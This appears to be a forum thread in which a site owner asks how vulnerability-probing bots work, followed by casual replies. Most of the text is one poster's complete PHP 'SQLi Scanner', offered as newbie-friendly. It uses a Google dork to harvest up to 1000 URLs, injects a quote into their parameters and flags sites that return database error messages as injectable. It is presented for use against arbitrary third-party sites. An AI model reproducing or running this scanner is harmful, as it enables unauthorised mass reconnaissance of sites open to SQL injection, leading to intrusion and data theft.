Programming bots

[fishtits]

I log about 20 IP's a day testing my site for vulnerabilities to SQL injections, javascript injections, directory traversal, XSS and more. Theres no way these are humans. Although these things are a pain in the ass because I have to sift through pages of this crap when I'm looking for human activity, I like the idea of programming bots to scour the internet and do stuff for you. How do these bots work, do they use search engines or something? Is there a great deal of programming knowledge required to be able to build a simple bot?

[insomaniacal]

There are plenty of kinds of bots. The kind you are talking about will connect to your site the same way a person would, and just inject code to test if your site is vulnerable.

It's not particularly hard to code a bot. You have to (generally) do the following

1: Connect to a server
2: Request or Receive data from the server.
3: Automate reading through it (Probably by manipulating strings and using if-then statements)
4: Based on #3, have the bot send some sort of reply, or do whatever you want it to do.

[sanddbox]

They either use search engines, crawl websites, or are directed to test your specific website (most likely at the command of a skiddie). They're nothing to worry about.

[fabianhjr]

Crawlers or search engines. Here is a sample of an address SQL injection bot:

Code: Select all

<!DOCTYPE html>
<html>
<head>
<meta name="robots" content="noindex, nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-16">
<title>SQLi Scanner</title>
<style type="text/css">
body{
background: #0F0F0F;
color: #FFFFFF;
font-family:  monospace;
font-size: 12px;
}

input{
background: #0F0F0F;
border: 1px solid #00FF00;
color: #00FF00;
}

h2{
color: #55FF2A;
}

a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
a:hover{ color: #00FF00; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }
</style>
</head>
<body>
<form action="<?php echo htmlentities($_SERVER['PHP_SELF']);?>" method="post">
Dork: <input type='text' name='dork' value='filetype:php id OR category' />
<input type='submit' value=' Start ' />
</form>
<hr />
<?php
if(isset($_POST['dork'])&&!is_array($_POST['dork'])) {
   @set_time_limit(0);
   $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
   $b = 0;

   while($b <= 900) {
      $a = 0;
      echo "<hr />";

      if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
         echo "<hr /><h2>No |more| results found.</h2>";
         break;
      }

      preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
      echo "Loadiing…<br />";
      flush(); ob_flush();
      while(1) {
         if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
            echo "<a href='".htmlentities(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQLi vulnerability detected!</font><br />";
         } else {
         echo "<a href='".htmlentities(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>No vulnerability found.</font><br />";
         flush(); ob_flush();
         }
         if($a > count($sites[2])-2) {
            break;
         }
         $a += 1;
      }
      $b += 100;
   }
}

function Connect_Host($url) {
   $ch = curl_init();
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_TIMEOUT, 10);
   $data = curl_exec($ch);
   return ($data) ? $data : 0;
}
?>
</body>
</html>

[Goatboy]

Fabi, when I first started reading your post I saw the HTML and thought "omgwat"

[fabianhjr]

Sorry, it isn't made by me. I got some source code collections and this seemed to be the best and most newby friendly.

Though, this only checks for URL SQL injections and up to 1000 per query.

[Goatboy]

Sorry, it isn't made by me. I got some source code collections and this seemed to be the best and most newby friendly.

Tough, this only checks for URL SQL injections and up to 1000 per query.

I figured it wasn't yours, but my first thought was still "HTML bot? What is he smoking?"

Also, it's "Though" you should be using. "Tough" es como "duro" y no pienso que es lo que quieres decir.

[sanddbox]

Sorry, it isn't made by me. I got some source code collections and this seemed to be the best and most newby friendly.

Tough, this only checks for URL SQL injections and up to 1000 per query.

I figured it wasn't yours, but my first thought was still "HTML bot? What is he smoking?"

Also, it's "Though" you should be using. "Tough" es como "duro" y no pienso que es lo que quieres decir.

I actually understood that Spanish. I feel proud.

[Goatboy]

I actually understood that Spanish. I feel proud.

Damn, I should have used the past-tense and made it harder on you. Next time I'll go into Shakespeare mode.

[fabianhjr]

xD yeah, sorry a typo. @sanddbox: alguna vez haz visitado Mexico?